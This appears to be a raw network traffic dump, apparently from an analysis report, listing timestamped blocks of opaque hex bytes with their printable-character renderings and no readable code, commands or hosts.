                                  2022-11-29 15:56:46 UTC2380INData Raw: df 01 19 18 8a 0a 8c 44 c3 f9 42 59 e1 d2 d6 ff cf b2 70 73 f2 5e e2 45 08 12 a4 4c 53 2b ba 1a c5 fd 02 49 2b 10 26 56 43 9e 32 a3 55 64 d2 1f f6 2b 99 53 11 ce 70 0c b8 a0 ae 04 01 a6 85 e9 5b 67 d4 30 e9 38 9d 78 40 e3 f1 b5 cb a6 1a d0 80 01 5a 33 e5 59 36 d6 2b dd da 8e b1 5c 40 3a 2e 76 15 bd 41 95 05 72 48 86 18 69 3b 6d e2 f5 20 82 84 5d 14 ef 8c 58 74 5d 6b 21 6d 3e 84 12 37 84 17 9f 34 97 ed a2 95 66 7e 9d 81 a7 9f 6b cf f5 d5 b5 5b da 76 21 cd 5a 78 7f 59 94 4f 77 ce 03 d2 9e 66 71 46 da 5e 11 59 65 16 c4 36 5e cc db 9d 65 09 2f 96 ff 88 9f 36 25 a6 ff 2a 39 cc 2f 7a 98 4d 89 8c 3e 2d 99 07 c1 fe 94 ec 30 e8 28 23 c8 65 21 94 d5 21 ef 09 81 25 03 24 f4 8b 20 ec 30 2c 0b 00 ad 00 f8 c4 06 56 00 fc a8 eb 01 e2 72 08 67 12 5b 99 03 bd eb f1 2d 24
                                  Data Ascii: DBYps^ELS+I+&VC2Ud+Sp[g08x@Z3Y6+\@:.vArHi;m ]Xt]k!m>74f~k[v!ZxYOwfqF^Ye6^e/6%*9/zM>-0(#e!!%$ 0,Vrg[-$
                                  2022-11-29 15:56:46 UTC2384INData Raw: 24 1b a2 a9 61 09 89 c0 43 0d e1 d4 d1 82 27 35 cd 01 ee c6 12 a1 71 99 9d 85 a6 75 ac 3c 19 fa 63 3b 6b 20 69 d4 fb a3 72 fa 6c 68 d1 eb 7b c7 e8 54 8e 0e 1b 1c b4 08 05 84 d5 52 76 02 eb 7f 1f fd b2 bb de 0e d3 c2 10 1a c3 5e 80 25 01 f8 d8 ca 5c 03 6f ed 24 44 49 c9 46 b3 cb 9b ec 0b c1 5a d1 cb 8e f9 90 d0 13 1c 7e 47 bc ee 60 8a 59 da b8 61 b8 af 2d 53 ba b9 8a cf f8 1b a4 9e 2e c1 0f 62 11 61 7f 2f 6a 6f d9 a7 0b 64 0a 58 c9 54 57 d1 06 bf ef 80 25 ac 3e fe 81 86 05 7c d8 cf d7 0d 00 ac 81 9a 02 d7 a0 93 f6 a8 fc 7b 4d 33 15 63 6c f3 8e b3 3d e7 73 b3 7d da ac 42 00 25 13 01 e1 2f 8e 75 ff 93 4a af 1c 09 f7 59 6a d2 3c 1e 33 3e cc da 49 72 35 4c 0e 2b b1 7d d8 25 be 69 78 cd 13 67 19 1e ca cb f4 90 36 60 99 12 09 c2 0c 06 fa 69 d4 3b 85 de b8 f8 32
                                  Data Ascii: $aC'5qu<c;k irlh{TRv^%\o$DIFZ~G`Ya-S.ba/jodXTW%>|{M3cl=s}B%/uJYj<3>Ir5L+}%ixg6`i;2
                                  2022-11-29 15:56:46 UTC2387INData Raw: d0 a2 c7 cc a3 29 09 26 d0 27 da d5 92 22 10 79 80 38 6b b7 ba 4c 8a 07 b5 97 41 e5 46 54 7a 4f 93 52 84 af 0b 55 4b 94 b8 5f ca e3 41 09 19 08 a0 5c 74 d5 96 fd f1 64 d3 ae d6 c4 29 0c 5c ea 55 e3 2c 53 b5 89 a1 b9 28 12 9b 13 b3 26 e9 6c 49 d0 57 35 ce 1c 7c 9f 6a 59 69 dc df 52 55 89 e9 27 1d 9c 7b de 00 98 3e af 9d bb 48 3a 6d fc 0a 94 83 ee 2e d1 db 6f fa 37 02 08 51 42 d9 81 9b fe 33 37 1c be cc 8a 5b ec fe e2 f5 52 5a d1 e0 75 85 e8 88 bf 3e 75 8f a3 af 7c 10 f9 e9 5b be 30 3f 6e fb fb b4 52 e5 5a b7 1b 31 9f ca 36 a6 b5 22 ee ae 37 99 5f d8 10 28 8c f8 34 f7 2f 6d 5b 51 9f ff b2 0f d7 43 1d 4a 0d c4 13 b5 b0 85 00 e4 8c f0 91 35 cb 6d 01 e1 f8 e5 f2 e1 28 88 25 24 7b de 8f 59 de 9c ce 27 35 6e 69 9e a6 c2 19 67 cc 72 32 02 73 b9 64 0d f2 5f 8b cb
                                  Data Ascii: )&'"y8kLAFTzORUK_A\td)\U,S(&lIW5|jYiRU'{>H:m.o7QB37[RZu>u|[0?nRZ16"7_(4/m[QCJ5m(%${Y'5nigr2sd_
                                  2022-11-29 15:56:46 UTC2388INData Raw: e4 82 c4 f2 18 b4 99 db 90 09 aa 8e e4 7c 8c 9d 34 a4 bc ad 37 8e 43 20 ab fb 79 16 08 17 5e a4 9d 47 5b 47 a8 8f 5f 08 9a 5a aa 05 ee 5e 68 b2 da a0 ed 42 8f 63 1c 6c e9 c7 f7 68 b7 df ef 94 46 93 95 48 f3 10 1d 4e 2f 37 b0 f6 36 29 a5 cd 0d cf ae e9 c9 cb d8 eb be 67 55 81 ee 45 97 e7 9a 1e b5 46 26 6a a4 97 7a 7b 56 5c f1 70 c1 c2 98 50 b2 60 32 d8 12 8c bf a6 6a 4f b9 1e 07 7c 90 63 c1 5f 3c a4 30 6b 15 1f 7c ac d8 a5 7f 75 03 f9 5a 26 41 1b 78 8a a3 86 36 98 e3 d8 09 d2 0a 06 a6 37 37 bc 8d 34 52 fb 1e 24 55 a7 d6 95 53 8e 68 06 99 38 5a 48 81 5d 1e 07 66 17 f2 bc e2 68 1d ca a2 39 67 70 e3 d2 48 31 13 ea 37 90 66 b7 8b c8 3d 1d 64 7c 06 25 03 89 54 6b fb 64 94 67 45 b9 fd 09 56 15 7a 35 37 af d9 fe cf a4 f0 89 92 65 5e ec 58 d8 3a ef 44 38 9f f7 82
                                  Data Ascii: |47C y^G[G_Z^hBclhFHN/76)gUEF&jz{V\pP`2jO|c_<0k|uZ&Ax6774R$USh8ZH]fh9gpH17f=d|%TkdgEVz57e^X:D8
                                  2022-11-29 15:56:46 UTC2392INData Raw: 9f 54 75 fc ec bf cb 59 f4 b5 81 d8 d5 3a a4 f5 3e e2 4b 40 4d 46 34 8b 8d c5 ff cd 72 c1 e5 14 87 28 57 bb 27 41 ca 46 08 b4 ca 62 a3 2a 15 f2 a4 5e 0f ca a1 80 3b f7 50 86 78 17 95 64 e2 d5 39 76 50 40 23 f6 fd 7b ba c8 50 ea e4 eb 85 c3 c9 ab 9f d1 a8 dd 7c b8 b5 f1 7c 66 9a d3 1d 61 81 37 6c cf 08 56 9b 18 c2 20 cc 6f 36 c5 70 ab e2 c0 1b 76 b6 8a 7f 60 0a 73 1b fd fa 1b 6c 36 77 59 1d 61 e1 bc fa 3d 22 c4 bd 46 0f af c0 e5 21 e5 77 35 99 e4 6a 44 56 30 b1 c5 db fa 12 7d 4d dd 36 16 9c 16 b7 19 a8 d0 56 45 8f 41 1a 2c 9e b2 c4 d5 ff be ed fe 9c b9 ee 79 20 61 44 07 40 da bc 56 41 8d ee 25 67 d9 e6 04 21 70 94 a7 16 aa 31 36 a5 cd ba 84 e7 8c 5b 49 9e 49 a1 57 a5 40 07 60 c6 8e a5 e5 c4 36 e9 07 3f 94 91 57 d9 cb 19 8a 71 65 e2 02 fb 37 85 50 ab 0e d8
                                  Data Ascii: TuY:>K@MF4r(W'AFb*^;Pxd9vP@#{P||fa7lV o6pv`sl6wYa="F!w5jDV0}M6VEA,y aD@VA%g!p16[IIW@`6?Wqe7P
                                  2022-11-29 15:56:46 UTC2396INData Raw: e6 4b 78 77 59 bc 8f 90 17 36 b2 66 cb cf 1b cb eb cb d3 3f 3b b6 05 64 61 73 36 fb f4 69 b3 ee 05 e9 f6 98 1b ca 59 50 e3 2b 57 3f ed 0d 30 bf 6f 99 5a cc e1 09 04 64 d7 e6 8a 4b 42 36 ee 75 4b 2c 74 21 d0 73 7d 0f 4b 79 d4 41 ab 94 17 98 89 16 c3 e4 fe 72 3b 9a da c9 6b 39 07 89 52 4c 51 f2 f1 4b 99 fa ff dd 80 76 d6 08 09 02 b0 8c 36 31 e9 e2 57 be af 01 36 ed 88 dc 7a 33 ab 4f 19 6b 28 70 da 6a 55 f6 69 d6 c6 aa c2 b0 c0 74 ec e6 7d a7 7a 0f a9 fe 77 02 9e 28 55 55 77 13 16 d8 6f 12 fe f5 47 fc 77 75 34 94 e5 12 79 27 ac a3 a1 76 92 82 e0 84 21 3f e4 60 0c dc 38 f7 9a 86 36 fb ce 62 8c 62 da cf e8 39 38 33 e6 a9 2f 3d 25 9e 30 3a c4 53 a0 dc b1 f2 33 bd c5 6a 8f 77 38 9e 74 a4 a7 2c 38 33 ad a1 f1 bf 07 d1 c6 fd c3 6a 93 a6 7e 74 47 60 3e 98 71 2b cd
                                  Data Ascii: KxwY6f?;das6iYP+W?0oZdKB6uK,t!s}KyAr;k9RLQKv61W6z3Ok(pjUit}zw(UUwoGwu4y'v!?`86bb983/=%0:S3jw8t,83j~tG`>q+
                                  2022-11-29 15:56:46 UTC2401INData Raw: 43 8f bc 23 22 f2 90 34 35 ac 83 45 21 80 9f 2d c8 fa 3e b9 83 c7 55 82 62 7e cc 0e 31 6b a0 09 76 d6 af 96 02 ff 9c a7 94 5c 8f 5c 6a c7 b4 91 30 f9 ec eb 8c b2 d7 0f 1d b5 11 40 8b d0 68 d6 5f b9 23 06 c9 32 5e 2e d3 a0 1e 27 95 c1 5a b2 ae d2 b7 bc b5 8e d5 b5 1e cb 34 6c 50 82 33 6f 40 a6 95 81 c6 6c 75 c3 51 b9 f3 05 fa f8 f9 3f 38 35 a6 d6 f4 3b d6 17 a4 ac 8d 6a bf 1b 0d dd 7f 74 2a 8d 21 57 e5 31 ee dc ac 92 16 e4 db 5e f2 bf 81 e1 b2 a6 6f 4b 04 bc 27 57 c2 bc 40 f0 00 00 63 50 f5 ba 83 ea 57 42 13 60 b0 4d ae da 70 07 fe fa 95 eb 3d 56 cd b7 10 5a 0b b7 2c 35 f3 8c 5a 97 03 d1 81 99 61 a4 4f 1e 04 0f 8a cd c5 01 c4 8a ee 19 71 78 e2 69 f1 ac 38 1c df 79 9b 70 79 74 a1 a2 fd 7f fe a4 fb fc 7f 60 90 7f 38 5e ec c0 62 14 7d 71 d8 81 65 65 8d f0 89
                                  Data Ascii: C#"45E!->Ub~1kv\\j0@h_#2^.'Z4lP3o@luQ?85;jt*!W1^oK'W@cPWB`Mp=VZ,5ZaOqxi8ypyt`8^b}qee
                                  2022-11-29 15:56:46 UTC2403INData Raw: a8 1e 74 38 f2 12 82 0e 7e a9 1a 5d a9 a9 0a 78 87 64 56 e0 df 39 a0 c0 c6 84 d3 9a de 82 c6 13 fb 19 7e 31 95 60 1e ac 6e ba 5a 48 6b 89 7a e1 ad 5c 00 9e 02 d1 d7 eb 2c aa 06 24 7e 77 4a 4f 0f 30 8d e2 37 11 54 31 fe 59 a1 d0 e4 11 06 f0 b1 11 f7 3f bd 24 e6 9b 9b f9 e6 6b 41 96 73 ea e1 ec e5 b4 c8 4d fd db b1 4d 18 77 7d b9 b2 39 e5 d8 1a 0d 5c 76 c0 eb b9 79 0b 84 aa 8d d8 0f b6 64 a2 f3 82 46 54 fa 74 3f 1d 86 b6 09 56 3a ac a4 80 30 d8 cb 85 9f f4 f7 67 f7 4f ea 25 e9 e7 a2 e6 e5 86 fb bf ec 97 55 d0 c9 39 cb b0 54 71 1e e9 9e b0 28 07 44 93 d9 6d c8 f8 bd 02 94 da 69 6d 4a be 61 48 7e bf 7d ca 7c 5a 40 3d 46 62 0f 9a 1a 93 cd fe bd 1b 42 44 de 9a 91 df c0 fc 70 cd bd ea 47 15 9d e3 2e 86 d0 62 bb 2f 30 f0 21 c3 32 65 50 52 d6 c0 76 80 2d 55 4d cc
                                  Data Ascii: t8~]xdV9~1`nZHkz\,$~wJO07T1Y?$kAsMMw}9\vydFTt?V:0gO%U9Tq(DmimJaH~}|Z@=FbBDpG.b/0!2ePRv-UM
                                  2022-11-29 15:56:46 UTC2407INData Raw: c0 74 b9 26 1b a0 a1 5b 5c ea 1c eb 9c 0c 73 a4 49 03 b9 f4 f1 d2 d3 2f c8 34 1d d7 32 46 7c 92 50 dc 84 4d 1d fb 43 36 cf 7e a6 7d 7a 87 9b 2b 5f f9 be 9a fd c0 59 91 8c bb 27 5a 3b a1 30 50 14 ee dc 68 a0 e9 b6 79 e6 d1 80 ba aa 8b a9 db eb 20 d9 6f 23 00 98 7d b2 6e a0 96 cb 61 b6 80 ee fd 78 2a c9 0b 60 43 68 4d 70 87 e8 61 d8 97 39 87 5e 5f 8f 74 7d 4f 0f c9 5c 72 17 58 55 d7 b5 14 56 4f ea 84 87 2b 6a de 61 1a dc 78 be 9e d2 61 29 b1 a6 f9 ed 26 5d 2e 49 8c 4d 3a 94 4b 5b d4 38 11 67 d4 ed 0a 55 0b 51 53 d1 a0 1c 1b 00 c7 d6 7d b2 66 1f 1f 67 16 18 f5 18 bb a3 53 83 5a 3d 36 73 79 f8 42 b9 06 6b c0 65 62 b8 9d 58 82 a7 a9 a1 05 f5 fd dc 06 60 12 a7 9d 00 74 d2 5a a0 17 4a ab d2 a2 47 a1 d3 a5 9a 04 81 a0 99 5e 3f b0 2d c2 85 03 2d 98 33 bb 77 75 37
                                  Data Ascii: t&[\sI/42F|PMC6~}z+_Y'Z;0Phy o#}nax*`ChMpa9^_t}O\rXUVO+jaxa)&].IM:K[8gUQS}fgSZ=6syBkebX`tZJG^?--3wu7
                                  2022-11-29 15:56:46 UTC2423INData Raw: a6 59 86 a6 f2 3c 6d 36 34 31 37 f5 63 f4 d5 43 04 af 6d 68 55 78 67 11 32 ea 00 e1 06 a6 99 a1 da 91 d5 4e 79 ce cf bc 08 94 c7 28 de bb 77 69 63 7c 8e 5f b3 7a fe 38 49 e8 ea a6 e9 54 d8 6f a0 84 77 9b b7 0b bb 1a eb 9f fc f2 eb 37 98 b1 7c d3 39 b7 49 00 7b 2b e5 92 ad c8 2f a0 ee 9b 69 57 17 c5 a6 5a e3 b8 2d ff da ea 33 19 34 fd de f4 34 03 d8 c6 71 69 77 a9 ca ab da ee ae 10 fd b5 99 88 fb 75 75 c9 32 cc 66 9a 6d 89 35 00 92 49 a0 2e be 67 0d 55 b7 da 70 18 0a 29 48 65 1e 4d b3 e9 c8 33 c9 c5 89 d9 d5 1e bf 8d 4d ac 87 f1 b1 5e ac a0 2a a6 ff 50 b7 85 1b f1 27 a7 e6 4c 52 a1 2e e0 e4 2e 95 64 89 fa f4 0d a7 52 9e 3c b5 51 48 07 05 65 b6 23 f8 fa c8 43 ea 2f cb 76 5f d5 6c 1b 96 8b 01 95 53 c7 3d 59 7a a3 52 dc 1c 95 c9 31 ea 09 2e ae 96 d3 59 81 09
                                  Data Ascii: Y<m6417cCmhUxg2Ny(wic|_z8ITow7|9I{+/iWZ-344qiwuu2fm5I.gUp)HeM3M^*P'LR..dR<QHe#C/v_lS=YzR1.Y
                                  2022-11-29 15:56:46 UTC2435INData Raw: 8c b6 4f 20 8d cf 47 8e 97 76 6c c8 a8 85 73 0e 01 1d bc 8b 22 ec 0f bd b7 73 68 5f 01 b5 c8 cd 9c e9 54 5e b9 72 6a 17 4c 34 59 a4 c1 d3 fc 95 f8 cb 90 d6 5b d9 b2 a4 e4 07 bc 05 a8 0b 64 69 95 d1 e9 8f f4 67 28 89 bd c3 03 99 53 e1 e1 a9 31 b2 e5 8a 80 e6 77 16 f4 be 71 54 92 53 f1 ba b2 51 e0 6f 03 98 bb f0 54 5b b3 2b 6d e5 50 a8 e0 c1 92 b5 de 82 fa 7e a7 db 27 e3 70 4c 34 fd eb 9f 71 7f d1 b7 d8 d7 5d a5 9c 7a c9 c0 5c ac 7d d9 0e c6 e1 86 a4 69 9e 83 31 ed 17 2c 77 ba 52 4e 85 c8 4e 54 5c 75 6c 0a e6 38 1f a9 ca 5c fb a7 ef 57 26 a7 cf e0 fd 69 09 12 bd a5 e8 b4 d6 94 d7 4a 3b 80 76 3f a2 71 88 e3 0f 7b a6 24 61 8f 35 89 4f ca 02 70 23 69 4a c8 d5 a2 4d 59 96 09 26 80 68 d1 6e 95 1d 38 9d d0 e6 b3 93 08 e7 84 56 e0 2e 71 6b f9 c1 0f db 19 f1 e2 69
                                  Data Ascii: O Gvls"sh_T^rjL4Y[dig(S1wqTSQoT[+mP~'pL4q]z\}i1,wRNNT\ul8\W&iJ;v?q{$a5Op#iJMY&hn8V.qki
                                  2022-11-29 15:56:46 UTC2451INData Raw: 75 91 e9 38 82 2c 5a 24 7a a1 ef 92 d8 d9 91 27 ba 9d 0b 90 97 d1 d5 db 89 ff d8 28 0f c3 91 9c bd 17 64 81 dc fa 80 2e 22 6f 77 1a 7d 17 94 39 15 39 10 f1 01 f7 cf 1d dd 07 80 c1 85 a9 23 70 63 7f 64 3c 8b d8 20 d1 08 00 70 3d 19 fa bb 39 63 f6 c3 24 59 ee cd 1e 30 36 42 17 45 5d 35 a3 d0 93 ca 09 0e ca f3 8c cf 0f ff 4a eb 16 71 25 6e 41 cb 0c b2 0f 15 78 e8 f9 61 35 ce 65 d8 ec 7c 13 74 ed 4b 4b 7c 28 07 40 ad b2 85 8f 36 f1 50 7b 41 d6 42 f1 df 5a bd 4c a0 94 17 1b d5 30 53 9d b3 de 77 af 71 a2 ec 94 69 8a 08 04 53 1e 6d 78 91 a4 83 b3 e5 2e a2 b0 45 33 f5 2c ef 75 54 a6 5a 0e 72 fb c9 36 63 40 ee 38 b3 72 36 ef f7 61 01 76 d5 60 e5 18 04 69 77 3a 44 2e dd 33 c1 f7 ab da e3 7e cb 8b 80 c7 82 b9 50 2b 52 70 ab 5f d1 de 5a 05 cf 71 ce 0a 25 df 55 d9 a2
                                  Data Ascii: u8,Z$z'(d."ow}99#pcd< p=9c$Y06BE]5Jq%nAxa5e|tKK|(@6P{ABZL0SwqiSmx.E3,uTZr6c@8r6av`iw:D.3~P+Rp_Zq%U
                                  2022-11-29 15:56:46 UTC2467INData Raw: 54 eb 92 d5 c1 88 ed f2 85 db fe d4 75 73 67 37 d0 af f5 18 ef 1f a3 2f 7e b5 93 7e ad 19 36 58 b8 f8 54 9c 8e d7 ac f7 c6 f7 27 4b 8c 26 a7 f0 e0 ef 22 d9 62 15 a9 cc 4f c0 31 08 79 a5 54 92 9f 30 76 12 4a bb 04 97 c0 8d f3 15 d7 3d e8 f7 e0 ff 78 e5 ca 1d 73 f9 e2 d0 4f 92 05 9a f2 66 9e d9 90 7d 58 3b 20 5b b3 fa 1b 61 b3 60 c4 b0 f4 cd 88 33 f7 8d e9 78 29 2c 58 9c 1c c4 59 13 c0 c0 76 2f 72 8c 72 fd f4 eb 6c 07 d1 82 30 48 65 1d db 91 5d 13 d6 bf 6f a1 3b 57 6b b1 bb 49 e2 88 48 c3 03 fe 64 58 c3 2d ea 2e b4 da 9e 90 ef cb 32 72 8c 4b 59 39 73 03 bd 0a 8b e8 8c 6d 3f 56 15 59 b3 ba 37 f8 1b 5c 73 bc 56 c3 6a a9 22 87 63 0c e1 a2 f3 ab c7 15 47 c4 ca 08 50 15 9f 5f e9 a9 42 19 29 48 f1 a9 37 0f 36 22 cb db af b1 d5 e5 c7 60 6c 78 43 bf 4e 09 df 18 19
                                  Data Ascii: Tusg7/~~6XT'K&"bO1yT0vJ=xsOf}X; [a`3x),XYv/rrl0He]o;WkIHdX-.2rKY9sm?VY7\sVj"cGP_B)H76"`lxCN
                                  2022-11-29 15:56:46 UTC2483INData Raw: 4c b2 60 01 59 30 4f 60 31 e0 0f 95 3b 43 ec 47 4c 1c 5a 5a 61 72 91 de 5e 5f 53 53 b2 3c bc 2f 66 2f c9 bf 10 22 7a 7c 54 c6 a9 95 b7 89 d1 e2 c2 89 38 de 59 53 4c 34 55 2a fe 0c 7a 0b 06 56 17 12 92 c4 ad 70 b7 6d ac c9 59 d9 97 58 0f d8 c6 6b 11 7a 8d 22 3a d7 fe b7 2d 41 b5 63 13 13 10 05 16 58 d5 ab 4c c0 b0 1b 38 bd 0f 24 aa d0 fa 03 82 6d 4d 90 c3 a4 02 78 cf ee 2c 11 ea 97 4c ea 0f 9a bd 45 38 49 73 f1 db 77 11 24 e5 f0 9c 55 74 d1 a4 dc 50 c9 77 fd 5b 8e 53 eb ce 18 e7 79 78 45 ac da 64 cf 70 14 1b b8 ed 61 44 4b 96 44 87 7d 43 d8 f8 a8 df ab e6 42 b0 4e 52 97 4e 0d 20 db 0a 12 cb 3d c6 52 b3 4e 77 bd ea a0 d3 60 86 6e 1d ca 3e 0c 26 74 e3 84 0e e7 42 ba 21 f2 d6 a9 6f d4 0c 11 b9 39 b3 91 8f f9 01 24 72 ea 76 7c fb 7a 19 d1 2c 18 ef 3f 4a 40 d1
                                  Data Ascii: L`Y0O`1;CGLZZar^_SS</f/"z|T8YSL4U*zVpmYXkz":-AcXL8$mMx,LE8Isw$UtPw[SyxEdpaDKD}CBNRN =RNw`n>&tB!o9$rv|z,?J@
                                  2022-11-29 15:56:46 UTC2499INData Raw: 08 a5 e5 6d 58 c4 60 c7 0c 84 9a 5f 60 07 c9 7f 17 36 f0 f4 a5 98 e0 14 ba 65 be ba 20 4f e6 28 f3 61 23 d6 04 16 7a ba 2a e8 d8 12 bb b7 47 ac 43 7c a3 72 60 4a c9 6d 73 5c 0d b5 14 20 27 89 ce b2 9f 1c 2f 0a de 71 84 2e f2 40 73 a7 70 3f 27 1e 6d d2 2d 27 f4 0b 90 c2 0d d6 46 10 af 87 b2 54 bb 58 89 ba 4f 0d 1c af b4 4e d8 49 3c 03 e8 a6 84 f9 2c d6 9d cd c7 f7 78 3d 76 03 8d 8a db d3 8c 22 27 bd 54 fb ba bd 8a 48 93 5b ff f0 8d 71 34 bf 01 4e 03 c8 c3 af d7 f3 f8 42 d7 19 6c 56 98 25 9c 65 1e 72 d9 a4 f7 d4 11 2f 59 6d 0c 7c 7b 7e 97 48 49 2e 8d 42 8e 8b cb c6 30 b9 9b a1 9a 9f 8a 0d 8c f8 d4 e1 44 f0 fe b8 2f 6d 11 e5 9f ba b3 65 8e 69 1d 0c 6a 6a 82 e1 b1 7d 51 ad d8 01 4a dc 48 de 71 83 d4 1b 97 4b ea 03 a8 0f 2d fe db cb 5a 79 43 2b 9b 28 ec d3 8e
                                  Data Ascii: mX`_`6e O(a#z*GC|r`Jms\ '/q.@sp?'m-'FTXONI<,x=v"'TH[q4NBlV%er/Ym|{~HI.B0D/meijj}QJHqK-ZyC+(
                                  2022-11-29 15:56:46 UTC2515INData Raw: 43 92 5d 9e f8 32 bb 60 a5 e5 13 58 64 8d db 4f 4f b4 eb 53 3d 90 14 db 41 16 7e ce 8f 7c c1 49 42 26 d0 1f a5 9a 39 27 21 8f 04 a4 8f 31 6c a2 0a c3 67 ad 05 93 0f 9f b0 62 a7 96 84 8e ec 61 a3 07 93 cb 26 76 b1 89 30 ca b5 b0 6a 8e 64 a8 73 01 27 7c f5 cd 76 43 2f 0c a9 72 ea d7 f4 a1 7f 04 f4 fe 28 82 3f 30 de 12 73 89 1c a1 25 6b 39 c3 be 58 0d d8 e4 e9 bf 4d 3f 62 85 e1 ed 1b f6 9b c7 25 6c e0 b1 0f d0 3e c5 20 81 86 29 95 10 8c 7f 01 52 a9 39 c8 b4 43 74 5d d0 07 f1 8d 0c 02 d4 f9 f8 cd a0 0e 3b b5 28 76 9d 76 26 78 f3 01 c6 24 1e fc 0a 4d 3c be f4 40 3d 31 a8 95 b8 cc 0e ea 98 b7 ca 2c d0 18 5e c6 4d e0 82 fd f4 92 b0 5a fd 5a bf 4c 02 6b 14 f5 3a cd 18 21 69 58 4c 56 aa 37 5b b2 22 41 09 22 b4 b0 78 f0 74 ab 02 29 28 43 12 e8 35 bb d5 79 d3 04 ec
                                  Data Ascii: C]2`XdOOS=A~|IB&9'!1lgba&v0jds'|vC/r(?0s%k9XM?b%l> )R9Ct];(vv&x$M<@=1,^MZZLk:!iXLV7["A"xt)(C5y
                                  2022-11-29 15:56:46 UTC2531INData Raw: 38 2d 49 8c c4 18 1c dd 95 5c 0f 48 13 04 8b 8b eb 5f be ad 4f f7 53 85 fb b6 da 52 4c 70 5b 54 a7 b2 2d d3 4a 31 09 f5 74 87 4d f0 5d 40 76 1b 45 84 fc 0c e4 e1 a0 2e c1 ea 10 19 9a a5 17 61 33 eb d5 86 37 76 f4 c8 6c b1 f5 cf 8e 06 7d ae ca 98 59 b8 c6 b3 04 5b 14 3f 85 b7 41 5d ae 02 8e dc 1d ea bb 7b 36 04 de fc 41 93 e6 e3 25 fa 74 9f 09 a9 05 0f a5 40 b2 79 05 62 51 45 ec 90 47 10 1c c9 6f c9 2c 66 05 13 e0 46 e0 1c 7b 5d ed 14 b2 43 c3 69 0c 3f 0e 75 f8 c2 58 fd e3 cb 7f ea a2 83 0a 11 38 7f 1b c7 67 1f 7c c0 9d d0 48 25 38 5c a1 3f 6e 60 af 1e 06 bf 65 cf 15 7b 83 fe 88 58 00 46 7b 97 46 f4 4b 4f 00 2e b3 27 11 91 7b d7 a5 09 d1 c2 45 be a6 26 31 59 9d 8d 10 f1 e5 81 26 dc af ce 03 b6 b5 76 e7 c1 24 26 79 ac 17 27 d0 5a 7d cc f9 35 8e 2c fc 8c 9a
                                  Data Ascii: 8-I\H_OSRLp[T-J1tM]@vE.a37vl}Y[?A]{6A%t@ybQEGo,fF{]Ci?uX8g|H%8\?n`e{XF{FKO.'{E&1Y&v$&y'Z}5,
                                  2022-11-29 15:56:46 UTC2547INData Raw: f6 e9 06 9e 0d 53 28 b2 af c3 dc 48 4c 6e 2b 1c 6b 08 28 7a 09 fd 6a 78 39 b3 ba bd 24 98 d1 20 e8 04 c2 7d ea c4 69 93 da 1c 6e 79 9a be f5 8b c7 70 e6 37 62 e3 91 c9 79 a5 44 38 48 46 63 ce 48 ee d1 28 cd 50 a5 3f 64 b6 4d 4f 3d ef 2e 1c 2c e3 73 54 b9 b9 e6 12 2d 30 e2 d5 c1 05 0a 49 f0 f8 82 9d bf e6 fc 55 ba 68 53 e3 43 58 e1 a4 06 52 da a0 0e 2e a5 5f 2f 1c d4 bb 01 ad 52 6b a9 90 97 d6 62 22 f7 61 07 46 78 9b 5d cd 48 e9 ba 84 85 eb cc 8a 41 0c 73 87 33 4f 8f 9a ff d8 75 ef ef bd f2 c2 95 64 ce 97 2a 1b d1 a4 58 b5 ec 2f 20 eb 9d 5e 55 7c 4f 4b 74 52 84 05 6a fc 93 33 b7 fb 20 5b f3 14 17 3b 31 52 c2 1b d7 83 d0 c0 58 b4 b6 ec 93 cb af cc f8 37 71 ac 38 d8 2e 68 2c 25 cd b3 d7 8e 0c bd a6 b2 4c 2d c0 da 85 59 ba a9 58 b6 c6 34 31 a1 3d 26 6e 81 16
                                  Data Ascii: S(HLn+k(zjx9$ }inyp7byD8HFcH(P?dMO=.,sT-0IUhSCXR._/Rkb"aFx]HAs3Oud*X/ ^U|OKtRj3 [;1RX7q8.h,%L-YX41=&n
                                  2022-11-29 15:56:46 UTC2563INData Raw: a8 5b 40 80 d6 7d ed b3 d9 a2 48 b0 36 eb 98 0b 0e 01 d1 de 76 0a a8 20 8e 3a 38 01 5e fb 4d 58 85 91 42 a1 47 69 75 e5 ef 8f 10 18 30 eb 5d be cd 17 3b ed 23 b8 3d ee a5 3f 52 4e c4 5b eb 29 4c e0 64 61 1d 07 62 65 ee 34 a5 20 78 d1 64 de dc 9d 34 83 be bd 76 2e d6 2d 9f 25 1a a2 89 43 0c 3c 71 91 75 28 3f b6 0c 0b 4d 10 ef a3 24 3a 07 db 4b 83 d2 0c e3 25 f5 2d 44 fa 57 cc 2a 0d 2c b4 63 f6 b4 d0 49 c1 55 6b 8a a7 f0 50 50 28 eb ab 2b d9 4a 76 62 7f e3 50 82 03 ac 03 50 a7 bd 2b 81 ac ad 62 26 fe fd 1d 66 9c c2 94 cb aa a6 29 f4 86 1d 23 1f 4d 17 50 fe 2c 93 57 15 a5 4f e4 97 68 06 47 56 0b 81 4c de 38 74 14 2b 7a 6b 37 78 20 02 65 27 31 93 ea 60 6c 7d 14 c0 d9 ec 43 e0 fd 80 60 6a 88 e2 b3 5b b6 45 10 37 03 17 67 8c 6b 94 ba 29 a1 12 86 c6 71 e3 f8 be
                                  Data Ascii: [@}H6v :8^MXBGiu0];#=?RN[)Ldabe4 xd4v.-%C<qu(?M$:K%-DW*,cIUkPP(+JvbPP+b&f)#MP,WOhGVL8t+zk7x e'1`l}C`j[E7gk)q
                                  2022-11-29 15:56:46 UTC2579INData Raw: 93 fd 3b 3f 96 3b af ed a3 9a 74 05 38 05 18 a3 94 96 f9 44 47 2d 9a 25 dd ef eb 4e cd 7f 69 f4 05 e8 f1 97 40 e0 c8 35 8d b9 ee c9 2d 4e 0a 17 64 c7 b2 dd e2 e8 4a e0 58 69 8d 83 4f 90 d8 04 4a e2 68 fc b6 13 4e 80 63 19 05 19 88 ac d3 39 63 e7 d4 f0 d8 4f 56 2f 43 81 0a 20 0c 57 a1 b3 90 ec 57 06 be b3 bd 04 b6 ce 60 01 28 d2 f6 4d 87 d2 d1 2c 8c 9c 3b 96 d5 4e fb b4 9e 51 ba 80 41 ca 7a 76 51 2b 10 05 91 84 5a fb 5d 98 fc d8 9e 83 34 d5 63 f0 41 3c 39 44 3e 2c cf 9f 01 df ee 75 10 bb 37 4f 77 e0 a5 4d 7c b6 e3 6e bc 6a db 70 20 e9 ff ee e1 72 c6 33 d4 48 a3 48 3d d9 33 31 3d 43 3b 91 1b 87 4e e9 c5 f1 bc a4 2f b1 e7 54 f1 c4 ac 06 ff 77 d3 9d 5b 90 95 44 e1 aa 65 f5 89 16 87 17 51 ec 13 41 d3 99 61 6c 03 d8 e1 2d 33 1d fe 83 01 cc 40 9a 44 4d af 49 8c
